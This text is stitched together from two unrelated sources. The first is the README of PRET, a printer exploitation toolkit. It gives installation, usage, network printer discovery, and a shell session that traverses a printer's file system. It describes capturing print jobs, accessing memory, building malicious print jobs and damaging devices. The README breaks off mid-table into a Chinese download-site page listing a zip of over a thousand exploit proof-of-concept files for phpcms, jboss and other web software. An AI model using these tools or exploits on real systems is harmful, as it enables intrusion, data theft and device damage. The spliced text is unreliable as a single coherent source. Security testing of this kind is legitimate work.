## PRET - Printer Exploitation Toolkit
**Is your printer secure? Check before someone else does...**
PRET is a new tool for printer security testing developed in the scope of a [Master's Thesis](http://nds.rub.de/media/ei/arbeiten/2017/01/13/exploiting-printers.pdf) at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently [PostScript](https://www.adobe.com/products/postscript/pdfs/PLRM.pdf), [PJL](http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf) and [PCL](http://www.hp.com/ctg/Manual/bpl13210.pdf) are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs, accessing the printer's file system and memory or even causing physical damage to the device. All attacks are documented in detail in the [Hacking Printers Wiki](http://hacking-printers.net/wiki/).
The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus, after entering a UNIX-like command, PRET translates it to PostScript, PJL or PCL, sends it to the printer, evaluates the result and translates it back to a user-friendly format. PRET offers a whole bunch of commands useful for printer attacks and fuzzing.
![PRET design](img/architecture.png)
### Installation
PRET only requires a Python2 interpreter. For colored output and SNMP support however, third party modules need to be installed:
# pip install colorama pysnmp
If running on a Windows console and Unicode characters are not displayed correctly, install the *win_unicode_console* module:
# pip install win_unicode_console
For experimental, ‘driverless’ printing (see print command), ImageMagick and GhostScript need to be installed:
# apt-get install imagemagick ghostscript
### Usage
```
usage: pret.py [-h] [-s] [-q] [-d] [-i file] [-o file] target {ps,pjl,pcl}
positional arguments:
target printer device or hostname
{ps,pjl,pcl} printing language to abuse
optional arguments:
-h, --help show this help message and exit
-s, --safe verify if language is supported
-q, --quiet suppress warnings and chit-chat
-d, --debug enter debug mode (show traffic)
-i file, --load file load and run commands from file
-o file, --log file log raw data sent to the target
```
###### Example usage:
$ ./pret.py laserjet.lan ps
$ ./pret.py /dev/usb/lp0 pjl
###### Positional Arguments:
PRET requires a valid target and a printer language as arguments. The target can either be the IP address/hostname of a network printer (with port 9100/tcp open) or a device like `/dev/usb/lp0` for a local USB printer. To quickly discover all network printers in your subnet using SNMP broadcast, simply run PRET without arguments:
```
./pret.py
No target given, discovering local printers
address device uptime status
───────────────────────────────────────────────────────────────────────────────
192.168.1.5 hp LaserJet 4250 10:21:49 Ready
192.168.1.11 HP LaserJet M3027 MFP 13 days Paper jam
192.168.1.27 Lexmark X792 153 days Ready
192.168.1.28 Brother MFC-7860DW 16:31:17 Sleep mode
```
The printer language to be abused must be one of `ps`, `pjl` or `pcl`. Not all languages are supported by every printer, so you may wan't to switch languages if you don't receive any feedback. Each printer language is mapped to a different set of PRET commands and has different capabilities to exploit.
###### Optional Arguments:
`--safe` tries to check via IPP, HTTP and SNMP if the selected printing language (PS/PJL/PCL) is actually supported by the device before connecting. On non-networked printers (USB, parallel cable) this test will fail.
`--quit` suppresses printer model determination, intro message and some other chit-chat.
`--debug` shows the datastream actually sent to the device and the feedback received. Note that header data and other overhead is filtered. The see the whole traffic, use wireshark. Debugging can also be switched on/off within a PRET session using the `debug` command
`--load filename` reads and executes PRET commands from a text file. This is usefull for automation. Command files can also be invoked later within a PRET session via the `load` command.
`--log filename` writes a copy of the raw datastream sent to the printer into a file. This can be useful to build a malicious print job file which can be deployed on another printer not directly reachable, for example by printing it from USB drive.
### Generic Commands
After connecting to a printer device, you will see the PRET shell and can execute various commands:
```
$ ./pret.py laserjet.lan pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.25
|=== |----| || by Jens Mueller <jens.a.mueller@rub.de>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 cause your device can be
|-||/_____\||-. | |´ more fun than paper jams 」
|_||=L==H==||_|__|/
(ASCII art by
Jan Foerster)
Connection to laserjet.lan established
Device: hp LaserJet 4250
Welcome to the pret shell. Type help or ? to list commands.
laserjet.lan:/> help
Available commands (type help <topic>):
=======================================
append debug edit free id ls open restart timeout
cat delete env fuzz info mirror printenv selftest touch
cd df exit get load mkdir put set traversal
chvol disable find help lock nvram pwd site unlock
close display format hold loop offline reset status version
laserjet.lan:/> ls ../../
- 834 .profile
d - bin
d - dev
d - etc
d - hp
d - hpmnt
- 1276 init
d - lib
d - pipe
d - tmp
laserjet.lan:/> exit
```
A list of generic PRET commands is given below:
```
help List available commands or get detailed help with 'help cmd'.
debug Enter debug mode. Use 'hex' for hexdump: debug [hex]
load Run commands from file: load cmd.txt
loop Run command for multiple arguments: loop <cmd> <arg1> <arg2> …
open Connect to remote device: open <target>
close Disconnect from device.
timeout Set connection timeout: timeout <seconds>
discover Discover local printer devices via SNMP.
print Print image file or raw text: print <file>|"text"
site Execute custom command on printer: site <command>
exit Exit the interpreter.
```
Generic file system operations with a PS/PJL/PCL specific implementation are:
```
┌───────────┬─────┬─────┬─────┬────────────────────────────────────────┐
│ Command │ PS │ PJL │ PCL │ Description │
├───────────┼─────┼─────┼─────┼────────────────────────────────────────┤
│ ls │ ✓ │ ✓ │ ✓ │ List contents of remote directory. │
│ get │ ✓ │ ✓ │ ✓ │ Receive file: get <file> │
│ put │ ✓ │ ✓ │ ✓ │ Send file: put <local file> │
│ append │ ✓ │ ✓ │ │ Append to file: append <file> <str> │
│ delete │ ✓ │ ✓ │ ✓ │ Delete remote file:
没有合适的资源?快使用搜索试试~ 我知道了~
各类POC集合大全
共1771个文件
py:1601个
png:27个
md:17个
1星 需积分: 40 112 下载量 50 浏览量
2019-04-26
09:26:51
上传
评论 6
收藏 11.17MB ZIP 举报
温馨提示
各类POC集合大全 没细看 1000多个吧 需要的可以下载下来看看
资源推荐
资源详情
资源评论
收起资源包目录
各类POC集合大全 (1771个子文件)
run.bat 35B
PingInfoView.cfg 800B
PingInfoView.chm 15KB
scanner.class 19KB
scanner$3.class 3KB
scanner$4.class 2KB
scanner$ThreadPool.class 2KB
scanner$2.class 1KB
scanner$1.class 1KB
scanner$ThreadPool$PooledThread.class 1KB
scanner$5.class 711B
scanner$6.class 526B
exampleOutput.csv 46B
pcl.dat 37KB
pjl.dat 33KB
ps.dat 33KB
SkinH_EL.dll 99KB
利用过程.docx 17KB
.DS_Store 62KB
hacker.eps 20KB
smiley2.eps 5KB
smiley.eps 5KB
dedecms5.7.exe 166KB
PingInfoView.exe 46KB
iconv.fne 928KB
iext3.fne 384KB
EDataStructure.fne 112KB
spec.fne 88KB
EThread.fne 60KB
YunThreadPool.fne 24KB
krnln.fnr 1.04MB
iext.fnr 216KB
.gitattributes 66B
HOST-RESOURCES-MIB 51KB
PingInfoView_lng.ini 2KB
proxy.ini 42B
Elasticsearch_1.2.jar 373KB
scanner.java 31KB
videoWall.jpg 92KB
zoomEyes.jpg 91KB
zabbix_jsrpc_SQL.json 1KB
Confluence_CVE20158399.json 777B
resin_fileread.json 651B
resin_fileread_1.json 601B
netgear_passwd.json 584B
glassfish_filread.json 577B
git_index_disclosure.json 530B
svn_entries_disclosure.json 529B
ElasticSearch_unauth.json 520B
resin_fileread_3.json 482B
axis_info.json 478B
Docker_Remote_API_20161220120458.json 474B
jboss_info.json 435B
exampleOutput.json 47B
LICENSE 34KB
LICENSE 34KB
LICENSE 1KB
SAP_pkt_decompr.lin 42KB
LICENSE.md 18KB
README.md 17KB
README.md 7KB
README.md 3KB
README.md 2KB
README.md 2KB
README.md 1KB
README.md 1KB
README.md 1KB
DISCLAIMER.md 940B
README.md 570B
README.md 485B
README.md 244B
CVE-2018-2628-README.md 188B
README.md 48B
README.md 16B
READM.MD 3B
SAP_pkt_decompr.osx 58KB
sap.single.pcap 192KB
gimp.pcl 53KB
takecover.pfa 1.82MB
paintcans.pfa 690KB
topsecret.pfa 473KB
stencilod.pfa 289KB
laksoner.pfa 170KB
gunplay.pfa 118KB
whoa.pfa 54KB
kshandwrt.pfa 21KB
jboss.php 7KB
phpcmsV9_uc_SQL.php 6KB
phpcms2008_preview.php 5KB
phpcms2008_c.php 4KB
phpcms2008sp3_SQL.php 4KB
exp.php 3KB
phpcms.php 2KB
joomla.php 2KB
dede_recommend.phpSQLI.php 2KB
PHPMS_V9_WAP_SQL 277B
in_x.png 714KB
in_4.png 586KB
in_1.png 537KB
in_5.png 508KB
共 1771 条
- 1
- 2
- 3
- 4
- 5
- 6
- 18
资源评论
- 上不怨天下不尤人2020-09-16什么鬼东西.....
伊甸园SUN
- 粉丝: 8
- 资源: 24
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功